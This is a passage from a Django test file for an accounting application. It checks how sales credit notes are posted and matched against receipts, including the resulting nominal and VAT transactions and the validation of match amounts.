)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-100 + -20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
1
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[0] # receipt created first before invoice
)
self.assertEqual(
matches[0].value,
2400
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
def test_selecting_a_transaction_to_match_but_for_zero_value(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(self.customer, "receipt", 1, self.period, -2400)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 0})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (100 + 20)
)
self.assertEqual(
header.goods,
-20 * 100
)
self.assertEqual(
header.vat,
-20 * 20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
-2400
)
self.assertEqual(
receipt.total,
2400
)
self.assertEqual(
receipt.paid,
0
)
self.assertEqual(
receipt.due,
2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-100 + -20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# INCORRECT USAGE
    # For a credit of 2400 the match value must be between 0 and 2400
def test_match_total_greater_than_zero(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
invoice_to_match = create_invoices(
self.customer, "invoice to match", 1, self.period, -2000)[0]
headers_as_dicts = [to_dict(invoice_to_match)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": -0.01})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<li class="py-1">Please ensure the total of the transactions you are matching is between 0 and 2400.00</li>',
html=True
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 1)
invoice_to_match = headers[0]
self.assertEqual(
invoice_to_match.total,
-2400
)
self.assertEqual(
invoice_to_match.paid,
0
)
self.assertEqual(
invoice_to_match.due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
0
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all()
self.assertEqual(len(lines), 0)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
# INCORRECT USAGE
    # Try to match -2400.01 against a receipt when the credit note being entered totals 2400
def test_match_total_less_than_invoice_total(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(
self.customer, "invoice to match", 1, self.period, -2500)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": -2400.01})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<li class="py-1">Please ensure the total of the transactions you are matching is between 0 and 2400.00</li>',
html=True
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 1)
receipt = headers[0]
self.assertEqual(
receipt.total,
2500
)
self.assertEqual(
receipt.paid,
0
)
self.assertEqual(
receipt.due,
2500
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
0
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all()
self.assertEqual(len(lines), 0)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
# CORRECT USAGE
# We've already tested we can match the whole amount and matching 0 does not count
# Now try matching for value in between
def test_matching_a_value_but_not_whole_amount(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(self.customer, "receipt", 1, self.period, -2400)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": -1200})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (100 + 20)
)
self.assertEqual(
header.goods,
-20 * 100
)
self.assertEqual(
header.vat,
-20 * 20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
-1200
)
self.assertEqual(
header.due,
-1200
)
self.assertEqual(
receipt.total,
2400
)
self.assertEqual(
receipt.paid,
1200
)
self.assertEqual(
receipt.due,
1200
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-100 + -20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
1
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[0] # receipt created first before invoice
)
self.assertEqual(
matches[0].value,
1200
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
"""
Test negative invoices now. I've not repeated all the tests
that were done for positives. We shouldn't need to.
"""
# CORRECT USAGE
def test_negative_invoice_entered_without_matching(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
matching_data = create_formset_data(match_form_prefix, [])
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
header = headers[0]
self.assertEqual(
header.total,
-20 * (-100 + -20)
)
self.assertEqual(
header.goods,
-20 * -100
)
self.assertEqual(
header.vat,
-20 * -20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
100 + 20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
def test_negative_invoice_without_matching_with_total(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": -2400
}
)
data.update(header_data)
matching_data = create_formset_data(match_form_prefix, [])
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
header = headers[0]
self.assertEqual(
header.total,
-20 * (-100 + -20)
)
self.assertEqual(
header.goods,
-20 * -100
)
self.assertEqual(
header.vat,
-20 * -20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
100 + 20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
"""
Test matching negative invoices now
"""
# CORRECT USAGE
def test_fully_matching_a_negative_invoice_NEGATIVE(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(
self.customer, "receipt", 1, self.period, 2400)[0] # NEGATIVE PAYMENT
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 2400})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (-100 + -20)
)
self.assertEqual(
header.goods,
-20 * -100
)
self.assertEqual(
header.vat,
-20 * -20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
2400
)
self.assertEqual(
header.due,
0
)
self.assertEqual(
receipt.total,
-2400
)
self.assertEqual(
receipt.paid,
-2400
)
self.assertEqual(
receipt.due,
0
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
100 + 20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
1
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[0] # receipt created first before invoice
)
self.assertEqual(
matches[0].value,
-2400
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
